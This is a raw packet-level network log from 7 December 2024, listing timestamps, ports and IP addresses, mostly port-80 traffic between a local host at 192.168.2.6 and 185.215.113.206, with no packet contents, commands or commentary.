Dec 7, 2024 10:51:17.517081022 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.556802988 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.556862116 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.557033062 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.557190895 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.560379028 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.560441017 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.560489893 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.560595036 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.567486048 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.567540884 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.570065975 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.570127964 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.570200920 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.570254087 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.577259064 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.577303886 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.577337027 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.577353001 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.584297895 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.584367990 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.584424973 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.584477901 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.591279984 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.591363907 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.591449976 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.591504097 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.597918987 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.597980976 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.598042965 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.598165035 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.604252100 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.604305029 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.604307890 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.604348898 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.610239029 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.610294104 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.610344887 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.610435009 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.615972042 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.616029978 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.616066933 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.616126060 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.627177000 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.627260923 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.627276897 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.627300978 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.629086018 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.629159927 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.629198074 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.629241943 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.633024931 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.633085012 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.633142948 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.633315086 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.636883020 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.636924982 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.636939049 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.636967897 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.640769958 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.640834093 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.640883923 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.640932083 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.644795895 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.644890070 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.644942999 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.648308039 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.648387909 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.648427010 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.648471117 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.652045965 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.652175903 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.652210951 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.652329922 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.655769110 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.655833006 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.655868053 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.655881882 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.659518003 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.659580946 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.659610987 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.659657001 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.663301945 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.663383961 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.663434982 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.666372061 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.666464090 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.666471004 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.666543961 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.666961908 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.667006016 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.667051077 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.667089939 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.670794010 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.670845032 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.697210073 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.697257042 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.697289944 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.697309017 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.698999882 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.699055910 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.699127913 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.699511051 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.703531981 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.703599930 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.703671932 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.703839064 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.704974890 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.704998970 CET	443	49717	20.199.58.43	192.168.2.6
Dec 7, 2024 10:51:17.705027103 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.705065966 CET	49717	443	192.168.2.6	20.199.58.43
Dec 7, 2024 10:51:17.706506968 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.706593990 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.706607103 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.706657887 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.710166931 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.710290909 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.748914957 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.748980045 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.749059916 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.749103069 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.750535965 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.750581026 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.750622034 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.750734091 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.753689051 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.753767967 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.754868984 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.754924059 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.754964113 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.755007982 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.757949114 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.758006096 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.758053064 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.758097887 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.761046886 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.761157036 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.761176109 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.761219025 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.764027119 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.764098883 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.764307022 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.764359951 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.766797066 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.766850948 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.766942024 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.767003059 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.769659042 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.769740105 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.769743919 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.769792080 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.771975040 CET	443	49703	173.222.162.64	192.168.2.6
Dec 7, 2024 10:51:17.772069931 CET	49703	443	192.168.2.6	173.222.162.64
Dec 7, 2024 10:51:17.772420883 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.772471905 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.772609949 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.772655010 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.775228977 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.775352001 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.775394917 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.775412083 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.777894974 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.777946949 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.777985096 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.778036118 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.780335903 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.780427933 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.780462027 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.780462027 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.782871962 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.782931089 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.782984018 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.785408974 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.785475016 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.785526991 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.787815094 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.787874937 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.787904024 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.788036108 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.790225983 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.790285110 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.790329933 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.790390015 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.792639017 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.792707920 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.792727947 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.792781115 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.794960976 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.795012951 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.819298029 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.819371939 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.819428921 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.820332050 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.820386887 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.820419073 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.820465088 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.822484016 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.822566986 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.822604895 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.822619915 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.824613094 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.824701071 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.824753046 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.826664925 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.826741934 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.826771975 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.826809883 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.828788042 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.828846931 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.828902006 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.830826998 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.830890894 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.830996037 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.831039906 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.832884073 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.832946062 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.832984924 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.833070993 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.834860086 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.834933996 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.834961891 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.835040092 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.836920977 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.836973906 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.837011099 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.837081909 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.838884115 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.838942051 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.839049101 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.839092016 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.840953112 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.840965986 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.841001034 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.841029882 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.842864037 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.842931032 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.842972994 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.843059063 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.844913006 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.844971895 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.844978094 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.845025063 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.846868038 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.846944094 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.846983910 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.847055912 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.848893881 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.848948002 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.848975897 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.849040985 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.850882053 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.851021051 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.851073980 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.852910042 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.853012085 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.853032112 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.853056908 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.854895115 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.854970932 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.855036020 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.855137110 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.856884003 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.856935024 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.856981039 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.857019901 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.858886003 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.858953953 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.858963013 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.859005928 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.887281895 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.887367964 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.887419939 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.887482882 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.887936115 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.887963057 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.887993097 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.888026953 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.889878035 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.889997005 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.890032053 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.890033007 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.891853094 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.891901970 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.892045021 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.892112017 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.895689964 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.895703077 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.895761967 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.895781040 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.896157980 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.896172047 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.896218061 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.896229029 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.898102999 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.898164034 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.898246050 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.898288965 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.900182009 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.900197029 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.900248051 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.901969910 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.902045012 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.902148962 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.902199030 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.941303015 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.941361904 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.941450119 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.941657066 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.942130089 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.942220926 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.942229033 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.942272902 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.943882942 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.943958044 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.943996906 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.944221020 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.945739985 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.945821047 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.945858955 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.945975065 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.947573900 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.947649956 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.947650909 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.947696924 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.949426889 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.949573040 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.949629068 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.953596115 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.953609943 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.953623056 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.953634977 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.953644991 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.953668118 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.954839945 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.954864979 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.954905033 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.954920053 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.956480026 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.956537008 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.956634045 CET	80	49713	185.215.113.206	192.168.2.6
